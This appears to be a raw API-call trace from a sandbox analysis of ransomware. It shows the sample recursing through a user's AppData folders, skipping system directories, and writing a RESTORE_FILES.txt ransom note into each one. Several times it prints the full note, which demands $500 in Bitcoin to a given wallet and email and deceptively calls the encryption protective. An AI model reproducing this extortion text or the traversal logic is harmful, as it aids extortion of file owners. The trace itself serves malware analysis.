[0078.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.052] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.052] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.052] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.052] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.052] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.052] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.052] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\..") returned 77 [0078.052] lstrcmpW 
(lpString1="..", lpString2=".") returned 1 [0078.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.052] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="Windows") returned -1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="Program Files") returned -1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="Program Files (x86)") returned -1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="$Recycle.bin") returned 1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="System Volume Information") returned -1 [0078.052] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ") returned 87 [0078.052] lstrcmpW (lpString1="6NG60CXZ.9GJ", lpString2=".") returned 1 [0078.052] lstrcmpW (lpString1="6NG60CXZ.9GJ", lpString2="..") returned 1 [0078.052] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*") returned 89 [0078.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.053] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.053] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.053] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.053] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.053] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\.") returned 89 [0078.053] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.053] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.053] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.053] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.053] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.053] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.053] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\..") returned 90 [0078.053] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.053] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.053] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Windows") returned -1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Program Files") returned -1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Program Files (x86)") returned -1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="$Recycle.bin") returned 1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="System Volume Information") returned -1 [0078.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned 142 [0078.053] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2=".") returned 1 [0078.053] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="..") returned 1 [0078.053] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*") returned 144 [0078.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0078.054] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.054] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.054] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.054] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.054] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.054] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\.") returned 144 [0078.054] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.054] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.054] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.054] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.054] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.054] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.054] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.054] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\..") returned 145 [0078.054] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.054] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.055] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="Windows") returned -1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="Program Files") returned -1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="Program Files (x86)") returned -1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="$Recycle.bin") returned 1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="System Volume Information") returned -1 [0078.055] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data") returned 147 [0078.055] lstrcmpW (lpString1="Data", lpString2=".") returned 1 [0078.055] lstrcmpW (lpString1="Data", lpString2="..") returned 1 [0078.055] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*") returned 149 [0078.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x295de10 | out: 
lpFindFileData=0x295de10) returned 0x47bb90 [0078.056] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.056] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.056] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.056] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.056] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.056] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\.") returned 149 [0078.056] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.056] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.056] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.056] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.056] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.056] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.056] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.056] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\..") returned 150 [0078.056] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.056] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.056] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0078.056] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0078.056] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\RESTORE_FILES.txt") returned 165 [0078.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0078.057] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.057] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0078.058] lstrlenA (lpString="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") returned 684 [0078.058] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.058] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.058] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.058] CloseHandle (hObject=0x15c) returned 1 [0078.058] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0078.058] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0078.058] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RESTORE_FILES.txt") returned 160 [0078.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.058] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.058] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0078.059] lstrlenA (lpString="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") returned 684 [0078.059] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0078.059] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.059] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.060] CloseHandle (hObject=0x158) returned 1 [0078.060] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.060] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.061] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\RESTORE_FILES.txt") returned 105 [0078.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.061] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.061] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.062] lstrlenA (lpString="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") returned 684 [0078.062] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.062] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.062] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.062] CloseHandle (hObject=0x154) returned 1 [0078.062] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0078.062] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0078.062] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\RESTORE_FILES.txt") returned 92 [0078.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0078.063] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.063] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0078.064] lstrlenA (lpString="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") returned 684 [0078.064] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0078.064] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.064] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.064] CloseHandle (hObject=0x150) returned 1 [0078.064] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0078.064] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0078.064] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\RESTORE_FILES.txt") returned 79 [0078.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0078.064] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.064] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0078.065] lstrlenA 